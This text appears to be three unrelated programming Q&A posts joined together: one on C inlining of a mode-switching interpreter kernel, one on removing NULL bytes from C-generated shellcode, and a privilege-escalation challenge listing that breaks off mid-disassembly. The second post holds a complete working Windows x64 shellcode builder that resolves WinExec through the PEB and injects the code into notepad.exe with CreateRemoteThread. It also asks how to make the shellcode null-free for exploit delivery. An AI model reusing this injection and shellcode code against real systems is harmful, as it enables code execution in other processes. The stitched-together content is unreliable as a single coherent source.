Inline function expansion with inner switch - C

Consider a complex procedure that implements a state machine and is driven by a state (mode) that never changes during a call to kernel, as in the code illustrated below.
void mode1(int recursion);
void mode2(int recursion);
static inline void kernel(int recursion, int mode){
    if(!recursion) return;
    // branches all lead to similar switch cases here.
    // logical branches and loops can be quite complicated.
    switch(mode){
        default: return;
        case 1: mode1(recursion-1);
        case 2: mode2(recursion-1);
    }
}
void mode1(int recursion){
    kernel(recursion,1);
}
void mode2(int recursion){
    kernel(recursion,2);
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
I came across this while implementing an interpreter for a subset of SPIR-V bytecode. The inner branch selects between finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switches on instruction opcodes. Writing separate functions for each state would be even more difficult to maintain, since the kernel already takes up 1000+ lines of code, and moving up and down between copies of the same traversal point to keep them in sync can be really difficult.
(I know modern C++ has if constexpr, but this is pure C code.)
Edit:
I've tried the following code with the MSVC compiler:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
    if (!recursion) return;
    // branches all lead to similar switch cases here.
    // logical branches and loops can be quite complicated.
    switch (*code) {
    default: return;
    case 1:
        switch (mode) {
        default: return;
        case 1: mode1(code + 1, recursion - 1);
        case 2: mode2(code + 1, recursion - 1);
        }
    case 2:
        switch(mode) {
        default: return;
        case 1: mode2(code + 1, recursion - 1);
        case 2: mode1(code + 1, recursion - 1);
        }
    }
}
void mode1(const uint32_t* code,int recursion)
{
    kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
    kernel(code, recursion, 2);
}
int main()
{
    mode1(interp_code, 5);
    return 0;
}
Defining INLINE as inline yielded a function call to kernel (with O2 optimizations), while defining it as __forceinline yielded the two modes compiled separately with no call to kernel.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271000 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF670271004 85 D2 test edx,edx
00007FF670271006 74 60 je mode1+68h (07FF670271068h)
00007FF670271008 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems that with inline, the compiler chose to inline the body of mode2 into mode1 and keep kernel as a separate function call. __forceinline forced mode1 and mode2 to be compiled into two function bodies, each with kernel expanded inside it. (This code has no break after each case, so the fall-through is expected.)
With O2, specifying inline yields exactly the same code as leaving INLINE empty.
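For anyone who wants to try the same experiment on more than one compiler, here is a minimal sketch of the pattern, not the interpreter from the question. It assumes that MSVC's __forceinline and the GCC/Clang always_inline attribute are acceptable; FORCE_INLINE, walk, walk_count, walk_sum and the two MODE_ constants are hypothetical names made up for this illustration, and the kernel here is a simple loop rather than a recursive traversal. Because mode is a literal constant at each call site, an optimizing compiler has the chance to fold the inner switch in each wrapper, but whether it really does still has to be checked in the disassembly.

```c
#include <stdint.h>

/* Hypothetical portability macro: request forced inlining where the
 * compiler offers it, fall back to plain static inline otherwise. */
#if defined(_MSC_VER)
#  define FORCE_INLINE static __forceinline
#elif defined(__GNUC__) || defined(__clang__)
#  define FORCE_INLINE static inline __attribute__((always_inline))
#else
#  define FORCE_INLINE static inline
#endif

enum { MODE_COUNT = 1, MODE_SUM = 2 };

/* Shared traversal. `mode` never changes during a call and is a
 * compile-time constant in every wrapper below. */
FORCE_INLINE uint32_t walk(const uint32_t *code, int n, int mode)
{
    uint32_t acc = 0;
    for (int i = 0; i < n; i++) {
        switch (mode) {
        case MODE_COUNT: acc += 1;       break; /* count instructions */
        case MODE_SUM:   acc += code[i]; break; /* sum instruction words */
        default:         return 0;
        }
    }
    return acc;
}

/* One thin wrapper per mode; these are the only entry points. */
uint32_t walk_count(const uint32_t *code, int n) { return walk(code, n, MODE_COUNT); }
uint32_t walk_sum(const uint32_t *code, int n)   { return walk(code, n, MODE_SUM); }
```

Calling walk_count and walk_sum on the interp_code array from the question ({1,2,1,1,2}) gives 5 and 7 respectively, so the two specializations are easy to tell apart when stepping through the generated code.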

How to remove NULL bytes from C generated shellcode?

For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
void print_shellcode(unsigned char* shellcode, int length)
{
printf("unsigned char shellcode[%d] = \n", length);
int i;
for (i = 0; i < length; i++)
{
if (i % 16 == 0)
{
printf("\"");
}
if (shellcode[i] == 0x00)
{
printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
}
else
{
printf("\\x%02x", shellcode[i]);
}
if ((i + 1) % 16 == 0)
{
printf("\"\n");
}
}
printf("\";\n");
}
DWORD GetNotepadPID()
{
DWORD dwPID = 0;
DWORD dwSize = 0;
DWORD dwProcesses[1024], cbNeeded;
if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
{
for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
{
if (dwProcesses[i] != 0)
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
if (hProcess)
{
TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
{
_tcslwr(szProcessName);
if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
{
dwPID = dwProcesses[i];
break;
}
}
CloseHandle(hProcess);
}
}
}
}
return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?

Is there a command execution vulnerability in this C program?

So I am working on a challenge problem to find a vulnerability in a C program binary that allows a command to be executed by the program (using the effective UID in Linux).
I am really struggling to find how to do this with this particular program.
The disassembly of the function in question (main function):
**************************************************************
* *
* FUNCTION *
**************************************************************
int __cdecl main(int argc, char * * argv)
int EAX:4 <RETURN>
int Stack[0x4]:4 argc
char * * Stack[0x8]:4 argv XREF[2]: 000109b0(R),
000109dd(R)
undefined4 Stack[-0x8]:4 local_8 XREF[1]: 00010bcb(R)
int Stack[-0xc]:4 in XREF[5]: 000109f0(W),
000109f3(R),
00010ad4(R),
00010b27(R),
00010b59(R)
int Stack[-0x10]:4 fd XREF[6]: 00010a1f(W),
00010a22(R),
00010aa5(R),
00010ab2(R),
00010ac9(R),
00010b4e(R)
pid_t Stack[-0x14]:4 pid XREF[4]: 00010a6b(W),
00010a6e(R),
00010a8b(R),
00010b6a(R)
int[2] Stack[-0x1c]:8 pipefd XREF[3,3]: 00010a3f(*),
00010a95(R),
00010b42(R),
00010abd(R),
00010b0f(R),
00010b36(R)
char Stack[-0x1d]:1 c XREF[2]: 00010b14(*),
00010b23(*)
int Stack[-0x24]:4 status XREF[2]: 00010b66(*),
00010b75(R)
main XREF[5]: Entry Point(*),
_start:00010866(*), 00010d30,
00010da0(*), 00011f34(*)
0001097d 55 PUSH EBP
0001097e 89 e5 MOV EBP,ESP
00010980 53 PUSH EBX
00010981 83 ec 1c SUB ESP,0x1c
00010984 e8 87 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010989 89 c3 MOV EBX,EAX
0001098b e8 80 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010990 53 PUSH EBX
00010991 50 PUSH EAX
00010992 e8 9d 16 CALL <EXTERNAL>::setreuid int setreuid(__uid_t __ruid, __u
00 00
00010997 83 c4 08 ADD ESP,0x8
0001099a e8 75 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
0001099f 89 c3 MOV EBX,EAX
000109a1 e8 6e 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
000109a6 53 PUSH EBX
000109a7 50 PUSH EAX
000109a8 e8 9b 16 CALL <EXTERNAL>::setregid int setregid(__gid_t __rgid, __g
00 00
000109ad 83 c4 08 ADD ESP,0x8
000109b0 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109b3 83 c0 04 ADD EAX,0x4
000109b6 8b 00 MOV EAX,dword ptr [EAX]
000109b8 85 c0 TEST EAX,EAX
000109ba 75 21 JNZ LAB_000109dd
000109bc a1 98 1f MOV EAX,[stderr]
01 00
000109c1 50 PUSH EAX
000109c2 6a 22 PUSH 0x22
000109c4 6a 01 PUSH 0x1
000109c6 68 50 0c PUSH s_Please_specify_the_file_to_verif_00010c50 = "Please specify the file to ve
01 00
000109cb e8 50 16 CALL <EXTERNAL>::fwrite size_t fwrite(void * __ptr, size
00 00
000109d0 83 c4 10 ADD ESP,0x10
000109d3 b8 01 00 MOV EAX,0x1
00 00
000109d8 e9 ee 01 JMP LAB_00010bcb
00 00
LAB_000109dd XREF[1]: 000109ba(j)
000109dd 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109e0 83 c0 04 ADD EAX,0x4
000109e3 8b 00 MOV EAX,dword ptr [EAX]
000109e5 6a 00 PUSH 0x0
000109e7 50 PUSH EAX
000109e8 e8 43 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
000109ed 83 c4 08 ADD ESP,0x8
000109f0 89 45 f8 MOV dword ptr [EBP + in],EAX
000109f3 83 7d f8 00 CMP dword ptr [EBP + in],0x0
000109f7 79 17 JNS LAB_00010a10
000109f9 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
000109fe e8 19 16 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a03 83 c4 04 ADD ESP,0x4
00010a06 b8 02 00 MOV EAX,0x2
00 00
00010a0b e9 bb 01 JMP LAB_00010bcb
00 00
LAB_00010a10 XREF[1]: 000109f7(j)
00010a10 6a 02 PUSH 0x2
00010a12 68 78 0c PUSH s_/dev/null_00010c78 = "/dev/null"
01 00
00010a17 e8 14 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
00010a1c 83 c4 08 ADD ESP,0x8
00010a1f 89 45 f4 MOV dword ptr [EBP + fd],EAX
00010a22 83 7d f4 00 CMP dword ptr [EBP + fd],0x0
00010a26 79 17 JNS LAB_00010a3f
00010a28 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
00010a2d e8 ea 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a32 83 c4 04 ADD ESP,0x4
00010a35 b8 05 00 MOV EAX,0x5
00 00
00010a3a e9 8c 01 JMP LAB_00010bcb
00 00
LAB_00010a3f XREF[1]: 00010a26(j)
00010a3f 8d 45 e8 LEA EAX=>pipefd,[EBP + -0x18]
00010a42 50 PUSH EAX
00010a43 e8 f8 15 CALL <EXTERNAL>::pipe int pipe(int * __pipedes)
00 00
00010a48 83 c4 04 ADD ESP,0x4
00010a4b 85 c0 TEST EAX,EAX
00010a4d 79 17 JNS LAB_00010a66
00010a4f 68 82 0c PUSH DAT_00010c82 = 70h p
01 00
00010a54 e8 c3 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a59 83 c4 04 ADD ESP,0x4
00010a5c b8 03 00 MOV EAX,0x3
00 00
00010a61 e9 65 01 JMP LAB_00010bcb
00 00
LAB_00010a66 XREF[1]: 00010a4d(j)
00010a66 e8 d9 15 CALL <EXTERNAL>::fork __pid_t fork(void)
00 00
00010a6b 89 45 f0 MOV dword ptr [EBP + pid],EAX
00010a6e 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a72 79 17 JNS LAB_00010a8b
00010a74 68 87 0c PUSH DAT_00010c87 = 66h f
01 00
00010a79 e8 9e 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a7e 83 c4 04 ADD ESP,0x4
00010a81 b8 04 00 MOV EAX,0x4
